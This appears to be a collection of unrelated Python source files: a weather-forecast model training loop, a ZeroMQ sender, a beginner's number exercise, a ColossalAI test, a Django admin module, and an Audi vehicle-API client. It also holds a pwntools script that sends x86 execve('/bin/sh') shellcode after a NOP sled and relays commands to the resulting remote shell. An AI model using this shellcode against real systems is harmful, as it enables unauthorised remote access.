print("- Timing AR validation with {} AR iterations:".format(validationDataset.ar_iterations))
validation_num_workers = tune_num_workers(dataset = validationDataset,
model = model,
optimizer = optimizer,
criterion = criterion,
num_workers_list = num_workers_list,
ar_scheduler = ar_scheduler,
ar_training_strategy = ar_training_strategy,
# DataLoader options
batch_size = validation_batch_size,
shuffle = shuffle,
shuffle_seed = shuffle_seed,
prefetch_in_gpu = prefetch_in_gpu,
prefetch_factor = prefetch_factor,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
# Timing options
training_mode = False,
n_repetitions = 5,
verbose = True)
print(' --> Selecting num_workers={} for ValidationDataLoader.'.format(validation_num_workers))
##------------------------------------------------------------------------.
## Create DataLoaders
# - Prefetch (prefetch_factor*num_workers) batches parallelly into CPU
# - At each AR iteration, the required data are transferred asynchronously to GPU
# - If static data are provided, they are prefetched into the GPU
# - Some data are duplicated in CPU memory because of the data overlap between forecast iterations.
# However this mainly affect boundary conditions data, because dynamic data
# after few AR iterations are the predictions of previous AR iteration.
t_i = time.time()
trainingDataLoader = AutoregressiveDataLoader(dataset = trainingDataset,
batch_size = training_batch_size,
drop_last_batch = drop_last_batch,
shuffle = shuffle,
shuffle_seed = shuffle_seed,
num_workers = training_num_workers,
prefetch_factor = prefetch_factor,
prefetch_in_gpu = prefetch_in_gpu,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
if validation_data_dynamic is not None:
validationDataLoader = AutoregressiveDataLoader(dataset = validationDataset,
batch_size = validation_batch_size,
drop_last_batch = drop_last_batch,
shuffle = shuffle,
shuffle_seed = shuffle_seed,
num_workers = validation_num_workers,
prefetch_in_gpu = prefetch_in_gpu,
prefetch_factor = prefetch_factor,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
validationDataLoader_iter = cylic_iterator(validationDataLoader)
print('- Creation of AutoregressiveDataLoaders: {:.0f}s'.format(time.time() - t_i))
else:
validationDataset = None
validationDataLoader_iter = None
##------------------------------------------------------------------------.
# Initialize AR_TrainingInfo instance if not provided
# - Initialization occurs when a new model training starts
# - Passing an AR_TrainingInfo instance allows to continue model training from where it stopped !
# --> The ar_scheduler of previous training must be provided to ar_Training() !
if ar_training_info is not None:
if not isinstance(ar_training_info, AR_TrainingInfo):
raise TypeError("If provided, 'ar_training_info' must be an instance of AR_TrainingInfo class.")
# TODO: Check AR scheduler weights are compatible ! or need numpy conversion
# ar_scheduler = ar_training_info.ar_scheduler
else:
ar_training_info = AR_TrainingInfo(ar_iterations=ar_iterations,
epochs = epochs,
ar_scheduler = ar_scheduler)
##------------------------------------------------------------------------.
# Get dimension and feature infos
# TODO: this is only used by the loss, --> future refactoring
dim_info = trainingDataset.dim_info
dim_order = trainingDataset.dim_order
feature_info = trainingDataset.feature_info
feature_order = trainingDataset.feature_order
dim_info_dynamic = dim_info['dynamic']
# feature_dynamic = list(feature_info['dynamic'])
##------------------------------------------------------------------------.
# Retrieve custom ar_batch_fun fuction
ar_batch_fun = trainingDataset.ar_batch_fun
##------------------------------------------------------------------------.
# Set model layers (i.e. batchnorm) in training mode
model.train()
optimizer.zero_grad(set_to_none=True)
##------------------------------------------------------------------------.
# Iterate along epochs
print("")
print("========================================================================================")
flag_stop_training = False
t_i_scoring = time.time()
for epoch in range(epochs):
ar_training_info.new_epoch()
##--------------------------------------------------------------------.
# Iterate along training batches
trainingDataLoader_iter = iter(trainingDataLoader)
##--------------------------------------------------------------------.
# Compute collection points for SWAG training
num_batches = len(trainingDataLoader_iter)
batch_indices = range(num_batches)
swag_training = swag and swag_model and epoch >= swa_start
if swag_training:
freq = int(num_batches/(swag_freq-1))
collection_indices = list(range(0, num_batches, freq))
##--------------------------------------------------------------------.
for batch_count in batch_indices:
##----------------------------------------------------------------.
# Retrieve the training batch
training_batch_dict = next(trainingDataLoader_iter)
##----------------------------------------------------------------.
# Perform autoregressive training loop
# - The number of AR iterations is determined by ar_scheduler.ar_weights
# - If ar_weights are all zero after N forecast iteration:
# --> Load data just for F forecast iteration
# --> Autoregress model predictions just N times to save computing time
dict_training_Y_predicted = {}
dict_training_loss_per_ar_iteration = {}
for ar_iteration in range(ar_scheduler.current_ar_iterations+1):
# Retrieve X and Y for current AR iteration
# - ar_batch_fun() function stack together the required data from the previous AR iteration
torch_X, torch_Y = ar_batch_fun(ar_iteration = ar_iteration,
batch_dict = training_batch_dict,
dict_Y_predicted = dict_training_Y_predicted,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
##-------------------------------------------------------------.
# # Print memory usage dataloader
# if device.type != 'cpu':
# # torch.cuda.synchronize()
# print("{}: {:.2f} MB".format(ar_iteration, torch.cuda.memory_allocated()/1000/1000))
##-------------------------------------------------------------.
# Forward pass and store output for stacking into next AR iterations
dict_training_Y_predicted[ar_iteration] = model(torch_X)
##-------------------------------------------------------------.
# Compute loss for current forecast iteration
# - The criterion expects [data_points, nodes, features]
# - Collapse all other dimensions to a 'data_points' dimension
Y_pred, Y_obs = reshape_tensors_4_loss(Y_pred = dict_training_Y_predicted[ar_iteration],
Y_obs = torch_Y,
dim_info_dynamic = dim_info_dynamic)
dict_training_loss_per_ar_iteration[ar_iteration] = criterion(Y_obs, Y_pred)
##-------------------------------------------------------------.
# If ar_training_strategy is "AR", perform backward pass at each AR iteration
if ar_training_strategy == "AR":
# - Detach gradient of Y_pred (to avoid RNN-style optimization)
dict_training_Y_predicted[ar_iteration] = dict_training_Y_predicted[ar_iteration].detach() # TODO: should not be detached after backward?
# - AR weight the loss (aka weight sum the gradients ...)
current_ar_loss = dict_training_loss_per_ar_iteration[ar_iteration]
current_ar_loss = current_ar_loss*ar_scheduler.ar_weights[ar_iteration]
# - Backpropagate to compute gradients (the derivative of the loss w.r.t. the parameters)
current_ar_loss.backward()
del current_ar_loss
##------------------------------------------------------------.
# Remove unnecessary stored Y predictions
remove_unused_Y(ar_iteration = ar_iteration,
dict_Y_predicted = dict_training_Y_predicted,
dict_Y_to_remove = training_batch_dict['dict_Y_to_remove'])
del Y_pred, Y_obs, torch_X, torch_Y
if ar_iteration == ar_scheduler.current_ar_iterations:
del dict_training_Y_predicted
##------------------------------------------------------------.
# # Print memory usage dataloader + model
# if device.type != 'cpu':
# torch.cuda.synchronize()
# print("{}: {:.2f} MB".format(ar_iteration, torch.cuda.memory_allocated()/1000/1000))
##----------------------------------------------------------------.
# - Compute total (AR weighted) loss
for i, (ar_iteration, loss) in enumerate(dict_training_loss_per_ar_iteration.items()):
if i == 0:
training_total_loss = ar_scheduler.ar_weights[ar_iteration] * loss
else:
training_total_loss += ar_scheduler.ar_weights[ar_iteration] * loss
##----------------------------------------------------------------.
# - If ar_training_strategy is RNN, perform backward pass after all AR iterations
if ar_training_strategy == "RNN":
# - Perform backward pass using training_total_loss (after all AR iterations)
training_total_loss.backward()
##----------------------------------------------------------------.
# - Update the network weights
optimizer.step()
##----------------------------------------------------------------.
# Zeros all the gradients for the next batch training
# - By default gradients are accumulated in buffers (and not overwritten)
optimizer.zero_grad(set_to_none=True)
##----------------------------------------------------------------.
# - Update training statistics # TODO: This require CPU-GPU synchronization
if ar_training_info.iteration_from_last_scoring == scoring_interval:
ar_training_info.update_training_stats(total_loss = training_total_loss,
dict_loss_per_ar_iteration = dict_training_loss_per_ar_iteration,
ar_scheduler = ar_scheduler,
lr_scheduler = lr_scheduler)
##----------------------------------------------------------------.
# Printing infos (if no validation data available)
if validationDataset is None:
if batch_count % scoring_interval == 0:
print("Epoch: {} | Batch: {}/{} | AR: {} | Loss: {} | "
"ES: {}/{}".format(epoch, batch_count, num_batches,
ar_iteration,
round(dict_training_loss_per_ar_iteration[ar_iteration].item(),5), # TODO: This require CPU-GPU synchronization
early_stopping.counter, early_stopping.patience)
)
##-------------------------------------------------------------.
# The following code can be used to debug training if loss diverge to nan
if dict_training_loss_per_ar_iteration[0].item() > 10000: # TODO: This require CPU-GPU synchronization
ar_training_info_fpath = os.path.join(os.path.dirname(model_fpath), "AR_TrainingInfo.pickle")
with open(ar_training_info_fpath, 'wb') as handle:
pickle.dump(ar_training_info, handle, protocol=pickle.HIGHEST_PROTOCOL)
raise ValueError("The training has diverged. The training info can be recovered using: \n"
"with open({!r}, 'rb') as handle: \n"
" ar_training_info = pickle.load(handle)".format(ar_training_info_fpath))
##-----------------------------------------------------------------.
# TODO: SWAG Description
if swag_training:
if batch_count in collection_indices:
swag_model.collect_model(model)
##-----------------------------------------------------------------.
### Run validation
if validationDataset is not None:
if ar_training_info.iteration_from_last_scoring == scoring_interval:
# Set model layers (i.e. batchnorm) in evaluation mode
model.eval()
# Retrieve batch for validation
validation_batch_dict = next(validationDataLoader_iter)
# Initialize
dict_validation_loss_per_ar_iteration = {}
dict_validation_Y_predicted = {}
#----------------------------------------------------------.
# SWAG: collect, sample and update batch norm statistics
if swag_training:
swag_model.collect_model(model)
with torch.no_grad():
swag_model.sample(0.0)
bn_update_with_loader(swag_model, trainingDataLoader,
ar_iterations = ar_scheduler.current_ar_iterations,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
#----------------------------------------------------------.
# Disable gradient calculations
# - And do not update network weights
with torch.set_grad_enabled(False):
# Autoregressive loop
for ar_iteration in range(ar_scheduler.current_ar_iterations+1):
# Retrieve X and Y for current AR iteration
torch_X, torch_Y = ar_batch_fun(ar_iteration = ar_iteration,
batch_dict = validation_batch_dict,
dict_Y_predicted = dict_validation_Y_predicted,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
##------------------------------------------------.
# Forward pass and store output for stacking into next AR iterations
dict_validation_Y_predicted[ar_iteration] = swag_model(torch_X) if swag_training else model(torch_X)
##------------------------------------------------.
# Compute loss for current forecast iteration
# - The criterion expects [data_points, nodes, features]
Y_pred, Y_obs = reshape_tensors_4_loss(Y_pred = dict_validation_Y_predicted[ar_iteration],
Y_obs = torch_Y,
dim_info_dynamic = dim_info_dynamic)
dict_validation_loss_per_ar_iteration[ar_iteration] = criterion(Y_obs, Y_pred)
##------------------------------------------------.
# Remove unnecessary stored Y predictions
remove_unused_Y(ar_iteration = ar_iteration,
dict_Y_predicted = dict_validation_Y_predicted,
dict_Y_to_remove = validation_batch_dict['dict_Y_to_remove'])
del Y_pred, Y_obs, torch_X, torch_Y
if ar_iteration == ar_scheduler.current_ar_iterations:
del dict_validation_Y_predicted
##--------------------------------------------------------.
### Compute total (AR weighted) loss
for i, (ar_iteration, loss) in enumerate(dict_validation_loss_per_ar_iteration.items()):
if i == 0:
validation_total_loss = ar_scheduler.ar_weights[ar_iteration] * loss
else:
validation_total_loss += ar_scheduler.ar_weights[ar_iteration] * loss
##--------------------------------------------------------.
### Update validation info # TODO: This require CPU-GPU synchronization
ar_training_info.update_validation_stats(total_loss = validation_total_loss,
dict_loss_per_ar_iteration = dict_validation_loss_per_ar_iteration)
##--------------------------------------------------------.
### Reset model to training mode
model.train()
##--------------------------------------------------------.
### Print scoring
t_f_scoring = round(time.time() - t_i_scoring)
print("Epoch: {} | Batch: {}/{} | AR: {} | Loss: {} | "
"ES: {}/{} | Elapsed time: {}s".format(epoch, batch_count, num_batches,
ar_iteration,
round(dict_validation_loss_per_ar_iteration[ar_iteration].item(),5), # TODO: This require CPU-GPU synchronization
early_stopping.counter, early_stopping.patience,
t_f_scoring)
)
t_i_scoring = time.time()
##---------------------------------------------------------.
# The following code can be used to debug training if loss diverge to nan
if dict_validation_loss_per_ar_iteration[0].item() > 10000: # TODO: This require CPU-GPU synchronization
ar_training_info_fpath = os.path.join(os.path.dirname(model_fpath), "AR_TrainingInfo.pickle")
with open(ar_training_info_fpath, 'wb') as handle:
pickle.dump(ar_training_info, handle, protocol=pickle.HIGHEST_PROTOCOL)
raise ValueError("The training has diverged. The training info can be recovered using: \n"
"with open({!r}, 'rb') as handle: \n"
" ar_training_info = pickle.load(handle)".format(ar_training_info_fpath))
##--------------------------------------------------------.
##----------------------------------------------------------------.
# - Update learning rate
if lr_scheduler is not None:
lr_scheduler.step()
##----------------------------------------------------------------.
# - Update the AR weights
ar_scheduler.step()
##----------------------------------------------------------------.
# - Evaluate stopping metrics and update AR scheduler if the loss has plateau
if ar_training_info.iteration_from_last_scoring == scoring_interval:
# Reset counter for scoring
ar_training_info.reset_counter()
##-------------------------------------------------------------.
# If the model has not improved (based on early stopping settings)
# - If current_ar_iterations < ar_iterations --> Update AR scheduler
# - If current_ar_iterations = ar_iterations --> Stop training
if early_stopping is not None and early_stopping(ar_training_info):
# - If current_ar_iterations < ar_iterations --> Update AR scheduler
if ar_scheduler.current_ar_iterations < ar_iterations:
##----------------------------------------------------.
# Update the AR scheduler
ar_scheduler.update()
# Reset iteration counter from last AR weight update
ar_training_info.reset_iteration_from_last_ar_update()
# Reset early stopping
early_stopping.reset()
# Print info
current_ar_training_info = "(epoch: {}, iteration: {}, total_iteration: {})".format(ar_training_info.epoch,
ar_training_info.epoch_iteration,
ar_training_info.iteration)
print("")
print("========================================================================================")
print("- Updating training to {} AR iterations {}.".format(ar_scheduler.current_ar_iterations, current_ar_training_info))
##----------------------------------------------------.
# Update Datasets (to prefetch the correct amount of data)
# - Training
del trainingDataLoader, trainingDataLoader_iter # to avoid deadlocks
trainingDataset.update_ar_iterations(ar_scheduler.current_ar_iterations)
# - Validation
if validationDataset is not None:
del validationDataLoader, validationDataLoader_iter # to avoid deadlocks
validationDataset.update_ar_iterations(ar_scheduler.current_ar_iterations)
##----------------------------------------------------.
## Time execution
# - Time AR training
print("")
print("- Timing AR training with {} AR iterations:".format(trainingDataset.ar_iterations))
training_num_workers = tune_num_workers(dataset = trainingDataset,
model = model,
optimizer = optimizer,
criterion = criterion,
num_workers_list = num_workers_list,
ar_scheduler = ar_scheduler,
ar_training_strategy = ar_training_strategy,
# DataLoader options
batch_size = training_batch_size,
shuffle = shuffle,
shuffle_seed = shuffle_seed, # This cause training on same batch n_repetitions times
prefetch_in_gpu = prefetch_in_gpu,
prefetch_factor = prefetch_factor,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
# Timing options
training_mode = True,
n_repetitions = 5,
verbose = True)
print('--> Selecting num_workers={} for TrainingDataLoader.'.format(training_num_workers))
# - Time AR validation
if validationDataset is not None:
print("")
print("- Timing AR validation with {} AR iterations:".format(validationDataset.ar_iterations))
validation_num_workers = tune_num_workers(dataset = validationDataset,
model = model,
optimizer = optimizer,
criterion = criterion,
num_workers_list = num_workers_list,
ar_scheduler = ar_scheduler,
ar_training_strategy = ar_training_strategy,
# DataLoader options
batch_size = validation_batch_size,
shuffle = shuffle,
shuffle_seed = shuffle_seed,
prefetch_in_gpu = prefetch_in_gpu,
prefetch_factor = prefetch_factor,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
# Timing options
training_mode = False,
n_repetitions = 5,
verbose = True)
print('--> Selecting num_workers={} for ValidationDataLoader.'.format(validation_num_workers))
##----------------------------------------------------------------.
# Update DataLoaders (to prefetch the correct amount of data)
shuffle_seed += 1
trainingDataLoader = AutoregressiveDataLoader(dataset = trainingDataset,
batch_size = training_batch_size,
drop_last_batch = drop_last_batch,
shuffle = shuffle,
shuffle_seed = shuffle_seed,
num_workers = training_num_workers,
prefetch_factor = prefetch_factor,
prefetch_in_gpu = prefetch_in_gpu,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
trainingDataLoader_iter = cylic_iterator(trainingDataLoader)
if validationDataset is not None:
validationDataset.update_ar_iterations(ar_scheduler.current_ar_iterations)
validationDataLoader = AutoregressiveDataLoader(dataset = validationDataset,
batch_size = validation_batch_size,
drop_last_batch = drop_last_batch,
shuffle = shuffle,
shuffle_seed = shuffle_seed,
num_workers = validation_num_workers,
prefetch_in_gpu = prefetch_in_gpu,
prefetch_factor = prefetch_factor,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
validationDataLoader_iter = cylic_iterator(validationDataLoader)
##--------------------------------------------------------.
# - If current_ar_iterations = ar_iterations --> Stop training
else:
# Stop training
flag_stop_training = True
break
##----------------------------------------------------------------.
# - Update iteration count
ar_training_info.step()
##--------------------------------------------------------------------.
### Print epoch training statistics
ar_training_info.print_epoch_info()
if flag_stop_training:
break
##--------------------------------------------------------------------.
# Option to save the model each epoch
if save_model_each_epoch:
model_weights = swag_model.state_dict() if swag_training else model.state_dict()
torch.save(model_weights, model_fpath[:-3] + '_epoch_{}'.format(epoch) + '.h5')
##-------------------------------------------------------------------------.
### Save final model
print(" ")
print("========================================================================================")
print("- Training ended !")
print("- Total elapsed time: {:.2f} hours.".format((time.time()-time_start_training)/60/60))
print("- Saving model to {}".format(model_fpath))
model_weights = swag_model.state_dict() if (swag and swag_model) else model.state_dict()
torch.save(model_weights, f=model_fpath)
##-------------------------------------------------------------------------.
### Save AR TrainingInfo
print("========================================================================================")
print("- Saving training information")
with open(os.path.join(os.path.dirname(model_fpath), "AR_TrainingInfo.pickle"), 'wb') as handle:
pickle.dump(ar_training_info, handle, protocol=pickle.HIGHEST_PROTOCOL)
##-------------------------------------------------------------------------.
## Remove Dataset and DataLoaders to avoid deadlocks
del validationDataset
del validationDataLoader
del validationDataLoader_iter
del trainingDataset
del trainingDataLoader
del trainingDataLoader_iter
##------------------------------------------------------------------------.
# Return training info object
return ar_training_info
#-----------------------------------------------------------------------------.
|
import zmq
class Sender(object):
    """Publish text messages on a ZeroMQ PUB socket bound to tcp://*:5556."""
    # NOTE(review): these are *class* attributes — the zmq context and socket
    # are created once at class-definition time and shared by every Sender
    # instance. Confirm the sharing (and the import-time side effect) is
    # intentional; a second Sender() will try to re-bind the same port.
    port = "5556"
    context = zmq.Context()
    socket = context.socket(zmq.PUB)
    def __init__(self):
        # Bind the shared PUB socket to all interfaces on self.port.
        self.socket.bind("tcp://*:%s" % self.port)
    def send(self,message):
        # send_string encodes the message as UTF-8 before publishing.
        self.socket.send_string(message)
        print('sender message - %s' % message) # For debug uses
|
import math

# Read a 4-digit number and report whether it is a perfect square whose root
# equals the sum of its two-digit halves (e.g. 2025 -> 20 + 25 = 45 = sqrt(2025)).
# Fix: the original compared a float square root (num ** 0.5) to an int with
# ==; integer arithmetic via math.isqrt avoids float-equality pitfalls.
print('=' * 40, '\nESCREVA UM NÚMERO DE 4 DIGITOS')
print('=' * 40)
num = int(input('Número ? '))
dez1 = num // 100  # upper two digits
dez2 = num % 100   # lower two digits
raiz = math.isqrt(num)  # exact integer square root
# A float root can only equal dez1 + dez2 when num is a perfect square, so
# checking raiz * raiz == num preserves the original behaviour exactly.
if raiz * raiz == num and raiz == dez1 + dez2:
    print('-' * 40)
    print('ESSE NÚMERO É UM QUADRADO PERFEITO! :) ')
else:
    print('-' * 40)
    print('ESSE NÚMERO NÃO É UM QUADRADO PERFEITO! :( ' )
|
from functools import partial
import colossalai
import pytest
import torch
import torch.multiprocessing as mp
from colossalai.amp.amp_type import AMP_TYPE
from colossalai.logging import get_dist_logger
from colossalai.trainer import Trainer
from colossalai.utils import MultiTimer, free_port
from tests.components_to_test.registry import non_distributed_component_funcs
from colossalai.testing import parameterize
# Hyper-parameters for the trainer smoke test.
BATCH_SIZE = 4
IMG_SIZE = 32
NUM_EPOCHS = 200  # upper bound only; max_steps=3 in trainer.fit keeps runs short
CONFIG = dict(fp16=dict(mode=AMP_TYPE.TORCH))  # enable torch-native AMP fp16
@parameterize('model_name', ['repeated_computed_layers', 'resnet18', 'nested_model'])
def run_trainer(model_name):
    """Build the named test model, wrap it in a colossalai engine, and run a
    short Trainer.fit smoke pass (at most 3 steps per epoch)."""
    components = non_distributed_component_funcs.get_callable(model_name)
    build_model, train_dataloader, test_dataloader, make_optimizer, criterion = components()
    net = build_model()
    opt = make_optimizer(net.parameters(), lr=1e-3)
    engine, train_dataloader, *_ = colossalai.initialize(
        model=net,
        optimizer=opt,
        criterion=criterion,
        train_dataloader=train_dataloader,
    )
    logger = get_dist_logger()
    logger.info("engine is built", ranks=[0])
    trainer = Trainer(engine=engine, logger=logger, timer=MultiTimer())
    logger.info("trainer is built", ranks=[0])
    logger.info("start training", ranks=[0])
    trainer.fit(
        train_dataloader=train_dataloader,
        test_dataloader=test_dataloader,
        epochs=NUM_EPOCHS,
        max_steps=3,
        display_progress=True,
        test_interval=5,
    )
    # Free cached GPU memory so subsequent parameterized runs start clean.
    torch.cuda.empty_cache()
def run_dist(rank, world_size, port):
    """Per-process entry point for mp.spawn: initialise the distributed
    context on this rank, then run the trainer smoke test.

    Bug fix: the original only called colossalai.launch and returned, so the
    spawned workers never actually trained anything.
    """
    colossalai.launch(config=CONFIG, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')
    run_trainer()
@pytest.mark.dist
def test_trainer_no_pipeline():
    """Spawn one worker process per rank and run the no-pipeline trainer
    smoke test in each."""
    world_size = 4
    spawn_fn = partial(run_dist, world_size=world_size, port=free_port())
    mp.spawn(spawn_fn, nprocs=world_size)
if __name__ == '__main__':
    # Allow running this test directly, outside of pytest.
    test_trainer_no_pipeline()
|
"""
PKI module
"""
__all__ = ['pki_methods', 'pki_methods_spec', 'executables_path', 'config_methods', 'init_pki']
|
from __future__ import absolute_import
from django.contrib import admin
from .models import Question, Topic
class TopicAdmin(admin.ModelAdmin):
    """Admin options for Topic: auto-fill the slug from the name field."""
    prepopulated_fields = {'slug':('name',)}
class QuestionAdmin(admin.ModelAdmin):
    """Admin options for Question: inline-editable ordering/status and
    automatic maintenance of the created_by/updated_by audit fields."""
    list_display = ['text', 'sort_order', 'created_by', 'created_on',
                    'updated_by', 'updated_on', 'status']
    list_editable = ['sort_order', 'status']
    def save_model(self, request, obj, form, change):
        '''
        Update created-by / modified-by fields.
        The date fields are updated at the model layer, but that's not got
        access to the user.
        '''
        # If the object's new update the created_by field.
        if not change:
            obj.created_by = request.user
        # Either way update the updated_by field.
        obj.updated_by = request.user
        # Let the superclass do the final saving.
        return super(QuestionAdmin, self).save_model(request, obj, form, change)
# Register both models with the default admin site using the options above.
admin.site.register(Question, QuestionAdmin)
admin.site.register(Topic, TopicAdmin)
|
from pwn import *
import socket
import select
import sys
context.arch = 'i386'  # assemble the payload as 32-bit x86
# Payload executed on the remote side. From the instructions:
#   eax=0x3f (dup2), ebx=0, ecx=1, int 0x80  -> one dup2 syscall
#   eax=0xb (execve) with "/bin\x00sh\x00"... "/bin/sh" built on the stack,
#   ecx=edx=0 -> execve("/bin/sh", NULL, NULL)
# NOTE(review): despite the name, this is not a connect-back payload — it
# appears to assume the socket is already on a low fd on the target; only a
# single dup2 is issued and stderr is never redirected. Confirm against the
# vulnerable binary.
reverse_shellcode = asm('''
push 0x3f
pop eax
xor ebx, ebx
push 0x1
pop ecx
int 0x80
push 0xb
pop eax
push 0x0068732f
push 0x6e69622f
mov ebx, esp
xor ecx, ecx
xor edx, edx
int 0x80
''')
HOST = '0.0.0.0'  # listen on all interfaces
PORT = 4444
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((HOST, PORT))
sock.listen(1)
# Wait for a single victim connection, then deliver a NOP sled (0x3c bytes,
# presumably sized to the target's buffer — verify) followed by the payload.
conn, addr = sock.accept()
conn.sendall(b'\x90' * 0x3c + reverse_shellcode)
# Simple interactive relay: forward our stdin to the remote shell and print
# whatever the remote side sends back.
while True:
    reading, writing, exception = select.select([conn, sys.stdin], [], [])
    for s in reading:
        if s is sys.stdin:
            command = input().encode()
            conn.sendall(command)
        elif s is conn:
            conn.setblocking(0)
            data = conn.recv(4096).decode()
            print(data, end = '')
|
from abc import abstractmethod, ABCMeta
import json
import uuid
import base64
import os
import math
import re
import logging
from time import strftime, gmtime
from datetime import timedelta, datetime
from .audi_models import (
TripDataResponse,
CurrentVehicleDataResponse,
VehicleDataResponse,
VehiclesResponse,
Vehicle,
)
from .audi_api import AudiAPI
from .util import to_byte_array, get_attr
from hashlib import sha256, sha512
import hmac
import asyncio
from urllib.parse import urlparse, parse_qs, urlencode
import requests
from bs4 import BeautifulSoup
from requests import RequestException
from typing import Dict
# Polling parameters used by AudiService.check_request_succeeded.
MAX_RESPONSE_ATTEMPTS = 10
REQUEST_STATUS_SLEEP = 10  # seconds between status polls
# Status strings returned by the action/status endpoints.
SUCCEEDED = "succeeded"
FAILED = "failed"
REQUEST_SUCCESSFUL = "request_successful"
REQUEST_FAILED = "request_failed"
# Static fallback X-Client-ID (a dynamic one is normally obtained at login).
XCLIENT_ID = "77869e21-e30a-4a92-b016-48ab7d3db1d8"
_LOGGER = logging.getLogger(__name__)
class BrowserLoginResponse:
    """Couples an HTTP response with the URL it was requested from, so a
    redirect Location header can be resolved to an absolute URL."""
    def __init__(self, response: requests.Response, url: str):
        self.response = response  # type: requests.Response
        self.url = url  # type : str
    def get_location(self) -> str:
        """
        Returns the location the previous request redirected to
        """
        target = self.response.headers["Location"]
        if not target.startswith("/"):
            return target
        # Relative redirect: resolve it against the original request URL.
        return BrowserLoginResponse.to_absolute(self.url, target)
    @classmethod
    def to_absolute(cls, absolute_url, relative_url) -> str:
        """
        Converts a relative url to an absolute url
        :param absolute_url: Absolute url used as baseline
        :param relative_url: Relative url (must start with /)
        :return: New absolute url
        """
        parts = urlparse(absolute_url)
        return "{}://{}{}".format(parts.scheme, parts.netloc, relative_url)
class AudiService:
    def __init__(self, api: AudiAPI, country: str, spin: str):
        """Create the service wrapper.

        api: low-level HTTP client used for all requests.
        country: two-letter market code; defaults to "DE" when None.
        spin: the user's S-PIN, used for privileged actions (lock/unlock,
        pre-heater).
        """
        self._api = api
        self._country = country
        self._language = None
        self._type = "Audi"
        self._spin = spin
        # Per-VIN caches of home-region base URLs (see _fill_home_region).
        self._homeRegion = {}
        self._homeRegionSetter = {}
        # Endpoints/tokens below are populated during login_request.
        self.mbbOAuthBaseURL = None
        self.mbboauthToken = None
        self.xclientId = None
        self._tokenEndpoint = ""
        self._bearer_token_json = None
        self._client_id = ""
        self._authorizationServerBaseURLLive = ""
        if self._country is None:
            self._country = "DE"
    def get_hidden_html_input_form_data(self, response, form_data: Dict[str, str]):
        """Merge all hidden <input> name/value pairs from an HTML page into
        *form_data* and return it (the dict is mutated in place)."""
        # Now parse the html body and extract the target url, csrf token and other required parameters
        html = BeautifulSoup(response, "html.parser")
        form_tag = html.find("form")
        form_inputs = html.find_all("input", attrs={"type": "hidden"})
        for form_input in form_inputs:
            name = form_input.get("name")
            form_data[name] = form_input.get("value")
        return form_data
    def get_post_url(self, response, url):
        """Return the absolute POST target of the first <form> in *response*.

        Raises RequestException when the form action is neither absolute nor
        root-relative.
        """
        # Now parse the html body and extract the target url, csrf token and other required parameters
        html = BeautifulSoup(response, "html.parser")
        form_tag = html.find("form")
        # Extract the target url
        action = form_tag.get("action")
        if action.startswith("http"):
            # Absolute url
            username_post_url = action
        elif action.startswith("/"):
            # Relative to domain
            username_post_url = BrowserLoginResponse.to_absolute(url, action)
        else:
            raise RequestException("Unknown form action: " + action)
        return username_post_url
    async def login(self, user: str, password: str, persist_token: bool = True):
        """Authenticate with the given credentials.

        persist_token is accepted for API compatibility but is not used here.
        """
        await self.login_request(user, password)
    async def refresh_vehicle_data(self, vin: str):
        """Ask the vehicle to push fresh status data and poll the job status
        until it reports success (raises on failure or timeout)."""
        res = await self.request_current_vehicle_data(vin.upper())
        request_id = res.request_id
        checkUrl = "{homeRegion}/fs-car/bs/vsr/v1/{type}/{country}/vehicles/{vin}/requests/{requestId}/jobstatus".format(
            homeRegion=await self._get_home_region(vin.upper()),
            type=self._type,
            country=self._country,
            vin=vin.upper(),
            requestId=request_id,
        )
        await self.check_request_succeeded(
            checkUrl,
            "refresh vehicle data",
            REQUEST_SUCCESSFUL,
            REQUEST_FAILED,
            "requestStatusResponse.status",
        )
    async def request_current_vehicle_data(self, vin: str):
        """Trigger a fresh status request for *vin* and return the parsed
        CurrentVehicleDataResponse (contains the request id for polling)."""
        self._api.use_token(self.vwToken)
        data = await self._api.post(
            "{homeRegion}/fs-car/bs/vsr/v1/{type}/{country}/vehicles/{vin}/requests".format(
                homeRegion=await self._get_home_region(vin.upper()),
                type=self._type, country=self._country, vin=vin.upper()
            )
        )
        return CurrentVehicleDataResponse(data)
    async def get_preheater(self, vin: str):
        """Return the raw pre-heater (remote standheizung) status JSON."""
        self._api.use_token(self.vwToken)
        return await self._api.get(
            "{homeRegion}/fs-car/bs/rs/v1/{type}/{country}/vehicles/{vin}/status".format(
                homeRegion=await self._get_home_region(vin.upper()),
                type=self._type, country=self._country, vin=vin.upper()
            )
        )
    async def get_stored_vehicle_data(self, vin: str):
        """Fetch the server-side cached vehicle status and return it parsed
        as a VehicleDataResponse."""
        self._api.use_token(self.vwToken)
        data = await self._api.get(
            "{homeRegion}/fs-car/bs/vsr/v1/{type}/{country}/vehicles/{vin}/status".format(
                homeRegion=await self._get_home_region(vin.upper()),
                type=self._type, country=self._country, vin=vin.upper()
            )
        )
        return VehicleDataResponse(data)
    async def get_charger(self, vin: str):
        """Return the raw battery-charger status JSON."""
        self._api.use_token(self.vwToken)
        return await self._api.get(
            "{homeRegion}/fs-car/bs/batterycharge/v1/{type}/{country}/vehicles/{vin}/charger".format(
                homeRegion=await self._get_home_region(vin.upper()),
                type=self._type, country=self._country, vin=vin.upper()
            )
        )
    async def get_climater(self, vin: str):
        """Return the raw climatisation status JSON."""
        self._api.use_token(self.vwToken)
        return await self._api.get(
            "{homeRegion}/fs-car/bs/climatisation/v1/{type}/{country}/vehicles/{vin}/climater".format(
                homeRegion=await self._get_home_region(vin.upper()),
                type=self._type, country=self._country, vin=vin.upper()
            )
        )
